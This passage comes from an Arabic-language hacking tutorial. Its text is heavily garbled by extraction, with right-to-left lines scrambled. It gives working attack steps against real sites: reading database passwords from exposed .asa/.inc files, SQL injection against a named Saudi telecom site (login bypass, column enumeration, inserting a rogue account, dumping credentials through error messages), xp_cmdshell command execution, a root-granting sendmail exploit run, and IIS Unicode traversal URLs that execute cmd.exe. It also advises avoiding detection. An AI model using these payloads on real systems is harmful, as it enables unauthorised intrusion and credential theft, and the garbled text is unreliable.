‪ASP‬‬ ‫وملفات اخرى من نوع *‪ sql..

WSID=xxx.DATABASE=moe_dbs".asa‬‬ ‫‪global.PWD=.CreateObject("ADODB.asa‬‬‫‪milion.inc‬‬ ‫>!‪<--"include file = "database.SERVER=xxx.asa+.‫>‪%‬‬ ‫‪("Set DB= Server.Open "DRIVER=SQL‬‬ ‫‪Server. "_LinuxRay".htr‬‬ ‫‪223‬‬ . line 5/‬‬ ‫هناك ملف ينتهي بامتداد *‪ inc.APP=Microsoft (R) Developer‬‬ ‫‪"Studio.inc#--‬‬ ‫وهناك عدة ملفات تحتوي على كلمة المرور مثل ملفات‬ ‫‪global. "6666666‬‬ ‫‪<%‬‬ ‫‪----------------------------------------------------------------‬‬‫في الكود السابق ترى ان اسم المستخدم هو _‪LinuxRay‬‬ ‫وكلمة السر هي ‪6666666‬‬ ‫‪-----------------------------------------------------------------‬‬ ‫الشئ المضحك انه احيانا اذا كان هناك خطأ في صفحة ال ‪ ASP‬مثل التي ‪:‬‬ ‫‪'AMicrosoft VBScript runtime error '800a01a8‬‬ ‫‪'Object required: 'Conn‬‬ ‫‪filename.Connection‬‬ ‫‪DB.‬هذا ملف يحتوي على اوامر يتم تنفيذها من جانب الملقم ويحتوي على اسم‬ ‫المستخدم وكلمة المرور‬ ‫اذن ماذا تنتظر قم بسحب هذا الملف وذلك باضافة اسم الملف في عنوان الموقع ‪.inc.asa‬‬ ‫ليس من الضرورة ان تكون الملفات بهذه السماء لكن هذا هو المعتاد عليه من قبل مبرمجين ‪SQL‬‬ ‫وكل ماعليك فعله ان تكتب اسم الصفحة مثل التي ‪:‬‬ ‫‪global.sql‬‬ ‫‪global-direct.asa++‬‬ ‫‪beforemilion-global.‬‬ ‫وممكن ان ترى مثل هذا المر في صفحة ‪ASP‬‬ ‫عند تطبيق الثغرة عليها هذا يعني ان اوامر البرمجة داخل ملف ‪database.UID=sa.asa‬‬ ‫‪global.

‬‬ ‫سيظهر لك مربع لنشاء الملف اختر‬ ‫‪Create‬‬ ‫اي انشاء‬ ‫الن سترى مربع‬ ‫‪Data Link Properties‬‬ ‫تحتاج فقط لثلث معلومات اسم الموقع او الي بي ‪ -‬اسم المستخدم ‪ -‬كلمة المرور‬ ‫‪ ..2‬اسم المستخدم في ‪User Name‬‬ ‫‪ .‬‬ ‫انتهى‪،،،‬‬ ‫" درس مفصل عن الـ ‪" SQL‬‬ ‫>ةةةةة ةة ةةةةةةة ةةةة ةةةةة ةةةةةةةةة<‬ ‫‪224‬‬ .0‬لكني مازلت افضل‬ ‫استخدام البرنامج السهل ‪ACCESS 2000‬‬ ‫كل ما عليك فعله هو فتح البرنامح الذهاب الى قائمة‬ ‫‪File‬‬ ‫اختر‬ ‫‪New‬‬ ‫ومن قائمة الملفات الجديدة اختار‬ ‫‪(Project (Exiting Data‬‬ ‫اي مشروع قاعدة بيانات موجودة ‪.3‬كلمة السر ‪Password‬‬ ‫ملحظة ) قم بإزالة الصح من مربع ‪(Blank Password‬‬ ‫اضغط في البداية على ‪ Test Connection‬في السفل لختبار التصال بقاعدة البيانات اذا رأيت هذه‬ ‫العبارة ‪Test Connection Succeeded‬‬ ‫فمعناه ان التصال بقاعدة البيانات تم بنجاح‪.‬‬ ‫لقد اقتربنا من النهاية ‪ .‬ماذا بعد الحصول على اسم المستخدم وكلمة المرور ؟؟‬ ‫بعدها الدخول على قاعدة ال ‪!! SQL‬‬ ‫هناك عدة برامج تدخل على قاعدة البينات انا استخدم ‪ Visual interdev 6.‫هناك ثغرة قديمة في ‪ IIS 3‬وهي ان تضيف بعد صفحة ‪ ASP‬هذا الرمز ‪ data$::‬كما يلي‬ ‫‪file.asp::$data‬‬ ‫هذه الثغرة لتعمل ال على ‪ IIS 3‬فل تتعب نفسك بتطبيقها فقط للعلم ل اكثر ‪..‬‬ ‫يمكنك الن ان تختار اي قاعدة بيانات تريد الدخول اليها من القائمة المسندلة ‪:‬‬ ‫‪Select the data base on the server‬‬ ‫واضغط على ‪ OK‬او موافق ‪.1‬ادخل اسم الموقع في صندوق ‪Select or enter server name‬‬ ‫‪ .

Oracle‬‬ ‫يتم أستخلص المعلومات المطلوبه وترك البقيه‬ ‫حيث تأخذ معلومات من المستخدم ومن ثم تعالج ويستخدم بعضها في تكون‬ ‫أوامر الـ ‪ SQL‬ليتم أستخلص البيانات أو التأكد من صحة بعض المدخلت لبناء‬ ‫الصفحة المطلوبه أو قبول المستخدم أو رفضه‬ ‫دائما يتم طلب أسم مستخدم وكلمة مرور في الصفحات التي تخولك بعمل عمل ل‬ ‫يقوم به إل من قام صاحب الموقع بإعطائه الصلحيه للقيام بها‬ ‫كأن يقوم بحذف موضوعي ‪ (:‬أو تثبيته في القائمه ‪((((:‬‬ ‫حيث يتم التأكد من وجود أسم المستخدم في قاعدة البيانات وأن كلمة المرور المعطاه مطابقه لتلك الموجوده‬ ‫بجانب أسم المستخدم‬ ‫حيث يتم أخذ معلومه وتضمينها في أمر الـ ‪ SQL‬الذي يقوم بالتأكد من وجودها وصلحيتها‬ ‫ولكن يجب الحذر عند كتابة سكربت يقوم بتوثيق المستخدم للتأكد من أنه مخول له بالدخول للصفحه المحميه‬ ‫أم ل‬ ‫وذلك بالتأكد من نظافة القيم المستقبله من المستخدم وخلوها من أي رموز من شأنها أن تجعل أمر الـ ‪SQL‬‬ ‫خاطئ‬ ‫في بنائه أو القيام بأي أمر غير مسموح به‬ ‫سنتكلم الن عن ما يسمى ‪SQL injection‬‬ ‫حيث أنه ضعف في كتابة سكربت التوثيق وأيضا بوجود موقع للتجربه‬ ‫وهو موقع شركة التصالت السعوديه‬ ‫عنوان الموقع ‪/http://www.sa‬‬ ‫عند الدخول للصفحة الرئيسيه نجد رابط يختص بمقدمي خدمة أنترنت في السعوديه‬ ‫وهو ‪http://www.sa/arabic/scripts/ar_frame. MySQL.stc. line 33/‬‬ ‫وفي بعض الحالت يظهر الخطا التالي‬ ‫‪225‬‬ .‫>ةةةةةة‪< hish_hish :‬‬ ‫أتجهت غالبية المواقع لستخدام صفحات ديناميكيه ومنها ما نحن موجودين فيه ‪(:‬‬ ‫وتستخدم قواعد بيانات فيها كم كبير من المعلومات ‪.' '' quotation mark before the character string‬‬ ‫‪arabic/Scripts/ar_csd_reply.com.stc.asp?pagenum=25‬‬ ‫عند دخوله فأنه يطلب منك أسم مستخدم وكلمة مرور !!!!‬ ‫دائما في الحاله هذه أول ما يتبادر لنا هو الـ ‪SQL injection‬‬ ‫نقوم بتجربة‬ ‫أسم مستخدم ‪' :‬‬ ‫وكلمة مرور ‪' :‬‬ ‫فنحصل على الخطأ التالي‬ ‫اقتباس‪:‬‬ ‫‪Microsoft OLE DB Provider for ODBC Drivers error‬‬ ‫‪''80040e14‬‬ ‫]‪Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed‬‬ ‫‪.asp.‬‬ ‫وعن طريق سكربت مكتوب بإحدى لغات الويب الديناميكيه ‪ PHP‬أو ‪ASP‬‬ ‫والتي تعمل جمبا إلى جمب مع محركات قواعد البيانات ‪.com.‬‬ ‫‪SQL Server .

asp.''=before the character string ''' AND Password‬‬ ‫‪admin/admin.‬‬ ‫إذن لنتكلم عن الـ ‪ SQL injection‬بشيء من التفصيل‬ ‫لو كان لدينا سكربت يقوم بالتأكد من صلحية اسم المستخدم وكلمة المرور المدخله من المستخدم قأننا‬ ‫سنتحقق منها بالطريقة التاليه‬ ‫‪:code‬‬ ‫‪SELECT * from Users WHERE User_Name='<field from web‬‬ ‫‪'<form>' AND Password='<field from web form‬‬ ‫‪}( if( TRUE‬‬ ‫‪Login OK‬‬ ‫{‬ ‫‪} else‬‬ ‫‪Login FAILD‬‬ ‫{‬ ‫عند قيام أحد المسموح لهم بالدخول للصفحة المحميه فأنه يقوم بكل تأكيد بتوثيق نفسه قبل أن يسمح له‬ ‫بالدخول‬ ‫فعند قيامه بأدخال أسم المستخدم وكلمة المرور الخاصه به‬ ‫أسم المستخدم ‪admin :‬‬ ‫كلمة المرور ‪t0ps3cr3t :‬‬ ‫فإن شكل امر الـ ‪ SQL‬سيصبح بالشكل التالي ‪:‬‬ ‫‪:code‬‬ ‫‪SELECT * from Users WHERE Users_Name='admin' AND‬‬ ‫‪'Password='t0ps3cr3t‬‬ ‫وعند وجود سطر في جدول ‪ User‬تحقق فيه الشرط وهو أن يكون اسم المستخدم ‪ admin‬وكلمة المرور‬ ‫‪t0ps3cr3t‬‬ ‫فأن المر سيقوم بإرجاع قيمة ‪ TRUE‬أي أن المستخدم مخول بالدخول ‪.‫اقتباس‪:‬‬ ‫‪Microsoft OLE DB Provider for ODBC Drivers error‬‬ ‫‪''80040e14‬‬ ‫]‪Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed‬‬ ‫‪quotation mark‬‬ ‫‪.‬‬ ‫غير ذلك سيتم إرجاع ‪ FALSE‬وسيتم رفض الدخول‬ ‫ملحظه ‪ :‬يجب أن يكون لديك ولو القليل من المعرفه بأوامر الـ ‪. SQL‬‬ ‫>‪ <field from web form‬يحل محلها ما أدخله المستخدم في صفحة التحقق من صلحيته‬ ‫في تجربتنا عندما قمنا بإدخال ' كإسم مستخدم وبالمثل لكلمة المرور فأن أمر الـ ‪ SQL‬أصبح بالشكل‬ ‫التالي ‪:‬‬ ‫‪:code‬‬ ‫‪226‬‬ . line 13/‬‬ ‫وفي الخطأ هذا حصلنا على جزء من أمر الـ ‪ SQL‬وأيضا أسم أحد العمده في الجدول‬ ‫وهو ما يؤكد أمكانية عمل ‪ inject‬للـ ‪ SQL Query‬المستخدمه للتحقق صلحية أسم المستخدم وكلمة‬ ‫المرور المدخله ‪.

...‬حيث يمكننا الستعاضه عن ما أدخلناه قبل قليل‬ ‫بالمدخلت التاليه‬ ‫أسم مستخدم ‪--'blah' OR '1'='1 :‬‬ ‫وكذلك كلمة المرور ) في بعض الحالت يمكنك إهمال كتابة كلمة مرور لن ‪ --‬ستهملها لنها تأتي بعد اسم‬ ‫المستخدم في أمر الـ ‪SQL‬‬ ‫توجد طريقه مريحه جدا ومضمونه بحيث أنك لن تحتاج لتخمين أحد أسماء العمده‬ ‫وهي أستخدام ‪having clause‬‬ ‫بالطريقه التاليه‬ ‫أسم مستخدم ‪'having 1=1--‬‬ ‫حيث سنحصل على رسالة خطأ كالتاليه‬ ‫‪'Microsoft OLE DB Provider for ODBC Drivers error '80040e14‬‬ ‫‪227‬‬ .‫‪'=SELECT * from Users WHERE User_Name=' ' ' AND Password‬‬ ‫' '‬ ‫ونلحظ أننا قمنا بإغلق علمة التنصيص الولى وبقي علمة تنصيص لم تغلق بعد‬ ‫وهو ما أدى لظهور رسالة الخطأ !!‬ ‫الن نقوم بتجربة ٍام مستخدم ‪blah' OR '1'='1 :‬‬ ‫ومثلها لكلمة المرور‪.‬‬ ‫فيصبح شكل أمر الـ ‪SQL‬‬ ‫‪:code‬‬ ‫‪SELECT * from Users WHERE User_Name='blah' OR '1'='1' AND‬‬ ‫‪'Password='blah' OR '1'='1‬‬ ‫لنحلل المر كل جزء على حدا‬ ‫‪SELECT * from Users‬‬ ‫تعني أختر جميع السطور من الجدول ‪Users‬‬ ‫‪'WHERE User_Name='blah' OR '1'='1' AND Password='blah' OR '1'='1‬‬ ‫في هذا الجزء نقوم بتحديد السطر الذي سنقوم بإختياره وهو الذي تتحقق فيه الشروط‬ ‫'‪'blah' OR '1'='1‬‬ ‫هنا بوجود ‪ OR‬لم تصبح قيمة نصيه ولكن أصبحت شرط‬ ‫يصبح الشرط صحيح إذا كان طرف واحد على القل من الطراف المشتركه في الشرط صحيح‬ ‫وفي حالتنا فإن الطرف الول هو '‪'blah‬‬ ‫وهو بدون الخوض في تفاصيل لسنا في صددها الن يعبر عن قيمة صحيحه ‪TRUE‬‬ ‫والطرف الخر هو '‪'1'='1‬‬ ‫يمكنك الجابة عن إذا كانت ‪ 1‬مساويه لـ ‪ 1‬أم ل !!!!‬ ‫إذا سيكون شكل الشرط بعد تحليله هو ‪TRUE OR TRUE‬‬ ‫وبالتالي فإن النتيجه النهائيه للشرط هي ‪TRUE‬‬ ‫ونفس التفاصيل تحدث لكلمة المرور‬ ‫ملحظه مهمه جدُا‪ :‬القيمه ‪ TRUE‬التي نحصلها من الشرط ليست مساويه للكلمه ‪ TRUE‬التي نكتبها على‬ ‫لوحة المفاتيح الخاصه بنا‬ ‫لذلك ل تحاول إستخدام أسم مستخدم ‪ TRUE‬وكلمة مرور ‪ TRUE‬لتمام الـ ‪SQL injection‬‬ ‫الشرط السابق سيقوم بأختيار أول سطر من الجدول ‪ Users‬ويرجع محتوياته في مصفوفه‬ ‫وبالتالي في بعض الحالت ستجد أنك قد أستطعت الدخول للصفحة المحميه‬ ‫ولكن في حالت أخرى ل‬ ‫لنكمل التفاصيل ‪.‬‬ ‫يجب التنبه لنه ربما يكون الشرط في أمر الـ ‪ SQL‬وهو ما يأتي بعد ‪ WHERE‬يتحقق من عدة أشياء‬ ‫لذلك نستخدم ‪ (two dashes) --‬ليتم إهمال بقية السطر ‪ ..

Microsoft][ODBC SQL Server Driver][SQL Server]Column]
'cs_isp_user.UserID' is invalid in the select list because it is not
.contained in an aggregate function and there is no GROUP BY clause
Arabic/Scripts/ar_csd_reply.asp, line 33/
‫وبها أسم الجدول وأيضا أسم أول عمود‬
‫بعدها لنستطيع الحصول على اسماء بقية العمده‬
group by ‫سنستخدم‬
‫بالشكل التالي‬
'group by cs_isp_user.UserID-passwd ‫بعدها سنحصل على عمود أسمه‬
‫فنستخدمه للحصول على اسم العمود اللي يليه بالشكل التالي‬
'group by cs_isp_user.UserID,cs_isp_user.passwd-! ‫ونكرر زيادة أسم كل جدول مع العمود إلى أن نحصل على صفحة تخبرنا بأن أسم المستخدم خاطئ‬
‫نحتاج الن أن نقوم بجمع أكبر قدر ممكن من أسماء العمده في هذا الجدول‬
: ‫نقوم بإدخال التالي‬
--(blah' group by (username : ‫أسم مستخدم‬
: ‫فنحصل على الخطأ التالي‬
:‫اقتباس‬

Microsoft OLE DB Provider for ODBC Drivers error
''80040e14
Microsoft][ODBC SQL Server Driver][SQL Server]Invalid]
.'column name 'username
arabic/Scripts/ar_csd_reply.asp, line 33/

username ‫وهو ما يفيد بأنه ل يوجد عمود في هذا الجدول له السم‬
password ,username,id,userid,email ‫نقوم بتجربه السماء الشائعه مثل‬
first_name,
‫ فأننا نحصل على خطأ أخر وهو ما نبحث عنه‬userid ‫عند تجربتنا لـ‬
:‫اقتباس‬

Microsoft OLE DB Provider for ODBC Drivers error
''80040e14
Microsoft][ODBC SQL Server Driver][SQL Server]Column]
'cs_isp_user.passwd' is invalid in the select list because it
is not contained in either an aggregate function or the
.GROUP BY clause
arabic/Scripts/ar_csd_reply.asp, line 33/

228

‫هنا حصلنا على معلومتين وهي أسم الجدول وهو ‪cs_isp_user‬‬
‫وأيضا أسم أحد العمده وهو ‪passwd‬‬
‫نقوم الن بتكرار العمل السابق ولكن بإستخدام اسم العمود الجديد‬
‫فنقوم بإدخال أسم المستخدم التالي ‪--(blah' group by (passwd :‬‬
‫فنحصل على الخطأ التالي ‪:‬‬
‫اقتباس‪:‬‬

‫‪Microsoft OLE DB Provider for ODBC Drivers error‬‬
‫‪''80040e14‬‬
‫]‪Microsoft][ODBC SQL Server Driver][SQL Server]Column‬‬
‫‪'cs_isp_user.UserID' is invalid in the select list because it is‬‬
‫‪not contained in either an aggregate function or the GROUP‬‬
‫‪.BY clause‬‬
‫‪arabic/Scripts/ar_csd_reply.asp, line 33/‬‬

‫حصلنا على أسم عمود وهو ‪ UserID‬وهو نفسه ما قمنا بتخمينه وهو ‪userid‬‬
‫تجدر الشاره إلى أن ‪ MS SQL Server‬ليس حساس لحالة الحرف ‪(:‬‬
‫نلحظ أننا سنكون في حلقه غير منتهيه ول نحصل إل على أسماء الجداول ‪ UserID‬و ‪passwd‬‬
‫إذن الجدول ل يحوي إل على عمودين وهي التي حصلنا عليها‬
‫إذن في الحاله هذه نقوم بأدخال مستخدم جديد للجدول وبعدها نقوم بالدخول بشكل طبيعي من الصفحه‬
‫الخاصه بتسجيل الدخول ‪(:‬‬
‫سنقوم بكتابة التالي في خانة أسم المستخدم ‪blah' INSERT INTO :‬‬
‫‪cs_isp_user(UserID,passwd‬‬
‫( ‪--('VALUES('M_3','hi‬‬
‫حيث سيتم إضافة مستخدم جديد له أسم مستخدم ‪ M_3‬وكلمة مرور ‪hi‬‬
‫وبعدها تستطيع الدخول للصفحة المحميه بهذه البيانات على أنك مخول له بالدخول‬
‫في مثالنا )شركة التصالت( أنتهينا من استغلل أمكانية عمل ‪ inject‬لها ولكننا سنكمل الحديث عن طريقه‬
‫ممتعه لكي نستطبع قرائة اسماء المستخدمين وكلمات مرورهم وبعدها تستطيع الدخول بأي منها دون إضافة‬
‫نفسك‬
‫وهو المر الذي لن يضع شكوك حول وجود لشخص مشبوه‬
‫سنكمل ما بدأناه ولكن بإضافة عمود أخر له السم ‪ id‬وهو رقم تسلسلي لكل مستخدم ) تذكر أنه رقم(‬
‫إذن لدينا جدول أسمه ‪user‬‬
‫يحوي العمده التاليه‬
‫‪ id‬وهو رقم صحيح‬
‫‪ username‬وهو قيمة نصيه ) القيم النصيه يمكن أن تحوي أرقام( مثال ‪admin1‬‬
‫‪ passwd‬وهي أيضا قيمه نصيه‬
‫نجرب عمل ‪ union‬لقيمه نصيه وتحويلها إلى قيمة عدديه ) لن يتم التحويل ولكنه سيخرج رساله خطأ‬
‫ثمينه جدا(‬
‫ندخل اسم المستخدم ‪blah' union SELECT username FROM user :‬‬
‫و سنحصل على رسالة خطأ ل تفيدنا في شيء‬
‫رسالة الخطأ هي‬
‫اقتباس‪:‬‬

‫‪229‬‬

Microsoft OLE DB Provider for ODBC Drivers error
''80040e14
Microsoft][ODBC SQL Server Driver][SQL Server]All]
queries in an SQL statement containing a UNION operator
must have an equal number of expressions in their target
.lists
admin/admin.asp, line 13/

‫ مره واحد فتصبح بالشكل التالي‬id ‫نقوم بزيادة‬
blah' union SELECT username,username FROM user
‫فنحصل على نفس رسالة الخطأ‬
‫نتابع الزياده إلى أن نحصل على رسالة خطأ مختلفه‬
‫لنفترض أننا حصلنا على رسالة الخطأ الجديده عند أدخال اسم المستخدم التالي‬
blah' union SELECT username,username,usernam
e,username,username FROM user
‫فنحصل على رسالة الخطأ التاليه‬
:‫اقتباس‬

Microsoft OLE DB Provider for ODBC Drivers error
''80040e07
Microsoft][ODBC SQL Server Driver][SQL Server]Syntax]
error converting the
.varchar value 'Lame_Admin' to a column of data type int
admin/admin.asp, line 13/

‫( حصلنا على أول أسم مستخدم وهو عادًة ما يكون للدمن‬:
‫ أن يقوم بتحويل قيمة نصيه )وهي‬SQL ‫وسبب ظهور هذا الخطأ هو لننا نطلب من محرك‬
(int )‫( إلى قيمة عدديه صحيحه‬Lame_Admin
‫ إلى قيمة عدديه‬Lame_Admin ‫ لذلك يقوم بأخبارك أنه ل يستطيع تحويل‬, ‫وهو الشيء الغير مسموح‬
(: ‫ بعمله‬microsoft ‫( هذا أذكى شي قامت‬: ‫صحيحه‬
‫الن حصلنا على أسم المستخدم وسنحاول الحصول على كلمة المرور‬
blah' union SELECT passwd,passwd,passwd,pass: ‫ندخل أسم المستخدم التالي‬
wd,passwd FROM user
‫بنفس العدد السابق عند حصولنا على أسم المستخدم‬
‫سنحصل على هذا الخطأ‬
:‫اقتباس‬

Microsoft OLE DB Provider for ODBC Drivers error

230

‫‪''80040e07‬‬
‫]‪Microsoft][ODBC SQL Server Driver][SQL Server]Syntax‬‬
‫‪error converting the‬‬
‫‪.varchar value 'stupid' to a column of data type int‬‬
‫‪admin/admin.asp, line 13/‬‬

‫حصلنا على أسم المستخدم وكلمة المرور ويمكننا تسجيل الدخول للصفحة المحميه بدون وجود أي أثر لنا‬
‫إل إذا كانت الصفحه المحميه عند الدخول لها تقوم بطباعة بعض المعلومات مثل رقم اليبي لخر شخض قام‬
‫بالدخول بإسم المستخدم هذا‬
‫عندها فكر بما ستقوم به بنفسك‬
‫بقي أتكلم عن الـ ‪Stored Procedure‬‬
‫وهي كتشبيه أقرب إلى أدوات موجوده مسبقا ‪ Built-in‬تقوم بعمل محدد عند طلبها‬
‫ستستطيع الستفاده من الـ ‪ Stored Procedure‬إذا كان الـ ‪ SQL Server‬يعمل على المستخدم ‪sa‬‬
‫أو إذا كان المستخدم الذي يعمل عليه الـ ‪ SQL Server‬تم السماح له بٍاستخدامها‬
‫لذلك فأنت محظوظ عند حصولك على ‪ SQL Server‬بهذه المكانيات‬
‫يوجد أكثر من ‪Stored Procedure 100‬‬
‫في الجدول التالي أهمها‬
‫‪---------------------------+‬‬
‫‪+------------------------------------------------------------------------------+‬‬
‫| ‪ |----------xp_cmdshell‬تمرير أمر لنظام التشغيل ) يتم تنفيذه على حسب صلحيات‬
‫المستخدم(‪|-------‬‬
‫| ‪ |-----------xp_regread‬قراءة قيمة مفتاح في‬
‫الريجستري‪|--------------------------------------------‬‬
‫| ‪ |----xp_regdeletekey‬حذف مفتاح من‬
‫الريجستري‪|-------------------------------------------------‬‬
‫| ‪ |-xp_regdeletevalue‬حذف قيمة مفتاح من‬
‫الريجستري‪|--------------------------------------------‬‬
‫| ‪ |---------- xp_regwrite‬للكتابة في‬
‫الريجستري‪|-------------------------------------------------------‬‬
‫| ‪ |--xp_servicecontrol‬لبدأ أو أنهاء خدمة على‬
‫السيرفر‪|--------------------------------------------‬‬
‫‪----------------------------+‬‬
‫‪+-----------------------------------------------------------------------------+‬‬

‫أما طريقة الستفاده من أي من هذه الـ ‪ Procedure‬فهي بالشكل التالي‬
‫'‪exec master..xp_cmdshell 'dir‬‬
‫هذا مثال لطريقة أستخدام ‪ xp_cmdshell‬والبقيه مثله‬
‫عدا الكتابة في الريجستري فهو بالشكل التالي‬
‫'‪exec master..xp_regwrite 'REGISTERY KEY' VALUE‬‬
‫‪231‬‬

‫أيضا بقي الشاره إلى أنه بأمكانك قراءة كود ملفات ‪ asp‬التي يعمل عليها الموقع عن طريق إضافة جدول‬
‫جديد ومن ثم نسخ كود صفحة ‪ asp‬ووضعه‬
‫في هذا الجدول بالطريقة التاليه‬
‫))‪CREAT TABLE M_3 ( source varchar(8000‬‬
‫هذا السطر يقوم ببناء الجدول وأسم الجدول ‪ M_3‬وبداخله عمود واحد من النوع ‪ varchar‬حجمه ‪8000‬‬
‫بايت‬
‫بعد ذلك بأمكانك الن إضافة أي ملف على السيرفر إلى هذا الجدول ومن ثم قرائته بالشكل التالي‬
‫'‪bulk insert M_3 from 'c:\InetPub\wwwroot\login‬‬
‫‪asp.‬‬
‫ولقرائة ما تم نسخه يمكنك ذلك عن طريق رسائل الخطأ اللي تكلمنا عنها في الموضوع السابق‬
‫أسهلها هو عمل ‪ union‬حيث يتم توليد رسالة خطأ بها ما تم نسخه‪.‬‬

‫انتهى‪،،،‬‬

‫" درس لحتراف الهاك في اختراق المواقع "‬
‫>ةةةةة ةة ةةةةةةة ةةةة ةةةةة ةةةةةةةةة<‬
‫>ةةةةةة‪< CONIK :‬‬
‫أن شاء ال في تعلم أختراق المواقع وكيف يتم ولكن في البداية يجب أن نعلم أشياء عن الختراق‬
‫في البداية أو بمعنى أخر نعرف أساسيات مطلوبة في علم اختراق المواقع وطبعا نحن قلنا‬
‫في الدرس الول الى كان عن اختراق الجهزة أنه الى بى هو الباب والبورت هو المفتاح له‬
‫بس في أختراق المواقع يوجد لنا باب ولكن المفتاح يختلف وهو الثغرات ومافي اختراق في الدنيا‬
‫بدون ثغرة المهم المفروض ما نقول ثغرة ولكن نقول ضعف أمنى ‪-:‬‬
‫س ‪ -:1‬طيب ممكن تقول لى أيش هي الثغرات يعنى تعريف لها ؟؟‬
‫جـ‪ -:‬الثغرات هى ضعف أمنى يساعدك فى دخول نظام معين وأختراقه وقد تكون أيضا الطريقة المساعدة‬

‫‪232‬‬

‫التى تخليك تتحول من ‪ user‬الى ‪ administrator‬يعنى من مستخدم الى المدير المتصرف وتتضمن‬
‫ويجب‬
‫على الدوام معرفة الثغرات المنيه الجديدة وأستثمارها علشان ل يتنبه أصحاب المواقع بيها‬
‫يرقعوها ) يتم تقفليها (‬
‫وأقرب مثال لهذه الثغرات الضعف المني الذى أكتشف في الباتشى وهو سيرفر يركب على نظام ليونكس‬
‫وأى ضعف فى أحد البرامج أو قاعده بناء الموقع تعتبر ثغرة ومن الممكن استخدامها والستفاده‬
‫منها في أختراق الموقع المراد أختراقه والتحكم في الموقع ومشاهدة الباسوردات وكل ما تريد عن طريقها‬
‫س ‪ -:2‬طيب كيف انا استثمر الثغره اذا انا لقيتها ؟؟؟‬
‫جـ‪ -:‬من وقت ما أكتشفوا الثغرات كانت نسبة ‪ %99‬من الثغرات تكون سكربتاتها مكتوبه بالغه ‪ C‬وانته‬
‫تحتاج لمعرفة هذه اللغه أو‬
‫عليك تحويلها ‪.‬‬
‫كما أن هناك العديد من الثغرات يحتاج الى ‪ shell‬حتى انته تتمكن من الستفاده من هذه الثغره أو بمعنى‬
‫أخر الضعف‬
‫وعلى سبيل المثال بعض الثغرات الموجوده فى ‪ PHP‬تحتاج الى ‪ Shell PHP‬ومن هذه الكلم‪.‬‬
‫وعلى فكرة الضعف يكون في الصدارات الخاصة‬
‫وكمان في ثغره من نوع ‪ Kernel 2.2.x‬ولكن هذه المرة في نظام تشغيل ليونكس‬
‫) ملحظه هذه الثغرات التى تكون باللغة ‪ C‬تكون سيكربتات توجوده فى الموقع ( وهناك أيضا سيكربتات‬
‫أخرى مكتوبة باللغه ‪perl‬‬
‫ولزم فى هذه الحالة تكون انته مركب لوينكس علشان الوامر وأنا أنصحك تركب ‪linux Redhat 7.3‬‬
‫لنه أفضل من الماندريك وأذكر انه الخ بلك هانتر لمن انا سألته أركب الماندريك ول الريد هات قال لى انه‬
‫الماندريك صورة مبسطه‬

‫‪233‬‬

‫للريد هات بس غير قابله للتطور وأنه الريدهات أقوى وجزاة ال خير على هذه النصيحة نرجع للموضوع‬
‫س ‪ -:3‬كيف أحول لغه البيرل ؟؟‬
‫جـ‪ -:‬الطريقة مره سهله كلها اوامر عادية في البداية انته سوى هذه المر‬
‫‪file.pl/.‬‬
‫تعطيك هذه الرسالة‬
‫‪ ----Access Denied‬هذه الرسالة توضح عدم الموافقه‬
‫أذا صار لك كذا كا عليك سوى كتا بته المر هذه‬
‫‪ -----chmod +x Conik.pl‬لحظ مكان كونيك انته تكتب أسم الملف‬
‫وشغلة مره ثانية وشوف النتجيه راح تكون زى كذا‬
‫‪Conik.pl/. $‬‬
‫س ‪ -:4‬طيب بالنسبة للغة ‪C‬‬
‫جـ‪ -:‬علشان تحويل الملف لزم انته تخلى الملف يكون ملف تنفيذى بهذه المر‬
‫‪ <------ gcc -o Conik Conik.c‬لحظ انه انته تكتب أسم الملف بدال أسمى كونيك المراد تغيرة‬
‫يعنى على سبيل المثال ‪-:‬‬
‫‪gcc -o Conik conik.c‬‬
‫وراح يكون الملف جاهز بعد هذه المر‬
‫‪Conik.c/.‬‬
‫وبعد ماصار الملف جاهز‬
‫‪gcc -o sendmail sendmail.c $‬‬
‫‪sendemail/. $‬‬
‫‪<Usage : sendmail <host> <OS> <user> <password‬‬
‫‪<----- sendmail smtp.israel.com RedHat-7.3 anonymous anonymous /. $‬‬

‫‪234‬‬

‫لحظ انك انته تكتب هنا الموقع الى تبغاه مكان ‪israel‬‬
‫‪...connecting to host‬‬
‫‪...connected‬‬
‫‪id‬‬
‫‪(uid=0(root) gid=0(root‬‬
‫لحظ انه طلب ممنا الملقم للبرنامج ‪ Sendemail‬وكمان طلب نظام التشغيل واليوزر والباسورد‬
‫وبعد هذه كله البرنامج أعطانا أمتياز ‪ Root‬بسبب قيام البرنامج بتنفيذ الـ ‪Exan nofer‬‬
‫ملحظة ل تضن أنه لمن انا حطيت البرنامج ‪ XXX. SENDMAIL‬بدون اى سبب أنا حطيت لك هذه المثال‬
‫لنه هناك ثغره فى هذه البرنامج‬
‫وراح أشرحها لك أن شاء ال تعالى بس كان بدى تحفظ السم هذه ‪(-:‬‬
‫الظاهر انه نحنا أتوغلنا فى الموضوع زايدة عن اللزوم‬
‫س ‪ -:5‬يا ال كل هذه علشان ثغره بس بطلت أنا ما أبغا اتعلم‬
‫جـ‪ -:‬لووووول حبيب البى هذه الطريقة المعقده شوية للثغرات في ثغرات ثانية حلوة وسهله جدا جدا‬
‫س ‪ -:6‬أيش هي قو ل يا ‪ Conik‬ترى هذه الطريقة يبغالها نظام تشغيل وكمان لغه ‪ C‬و ‪Perl‬‬
‫في تغرات تستخدم من خلل المتصفح يعنى انته تشوف ملعومات الموقع عبر المتصفح وتوصل الى ملف‬
‫الباسوردات من هذه الطريقه‬
‫ومثال على هذه الثغرات ‪PHP - CGI - UNICODE - VB - etc‬‬
‫س ‪ -:7‬اوووووة ‪ UNICODE‬أنا سمعت عنها كثير نفسى اشوف كيف شكلها وأعرف ويش هى ؟؟؟‬
‫جـ‪ -:‬حبيبى ‪ UNICODE‬هى عبارة عن ضعف في نظام ‪ IIS‬في ‪ Microsoft‬مما تساعد في أختراق‬
‫الموقع بكل سهوله عموما الختراق بهذه الطرق سهل جدا‬
‫مقارنة بالطرق السابقة التى تم ذكرها من قبل وسوف أضع أمثله على ثغرات ‪-: UONICODE‬‬
‫‪vti_bin/.._/‬‬
‫‪%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../wi‬‬
‫‪\:nnt/system32/cmd.exe?/c+dir+c‬‬
‫‪Rpc/../‬‬
‫‪%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir‬‬
‫‪\:+c‬‬
‫‪samples/..%255c..%255c..%255c..%255c..%255c../‬‬
